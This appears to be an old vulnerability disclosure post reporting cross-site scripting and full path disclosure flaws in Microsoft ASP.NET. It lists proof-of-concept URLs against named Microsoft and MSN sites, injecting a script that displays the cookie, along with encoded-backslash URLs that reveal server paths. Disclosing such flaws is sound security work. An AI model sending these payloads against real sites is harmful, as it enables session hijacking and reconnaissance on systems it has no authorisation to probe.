Microsoft ASP.NET Cross Site Scripting and Full Path Disclosure vulnerability This is based on Microsoft .NET. Examples how it can be exploited: Cross Site Scripting: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://ulogin.bcentral.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null http://www.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null http://my.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null http://dotnet.microsoft.com/<script>alert(document.cookie)</script>.aspx http://terraserver.microsoft.net/<script>alert(document.cookie)</script>.aspx http://support.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null http://office.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null http://communities.microsoft.com/~/<script>alert(document.cookie)</script>.aspx http://uddi.microsoft.com/~/<script>alert(document.cookie)</script>.aspx This vulnerability exists on older .NET versions: Full Path Disclosure vulnerability: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://terraserver.microsoft.com/a%5c.aspx http://uddi.microsoft.com/a%5c.aspx I've posted via Microsoft security subscribe website that there is a vulnerability and how to exploit on one of their site long times ago (1/2 year ago), and haven't got any response of them. -- Johannes Westerink
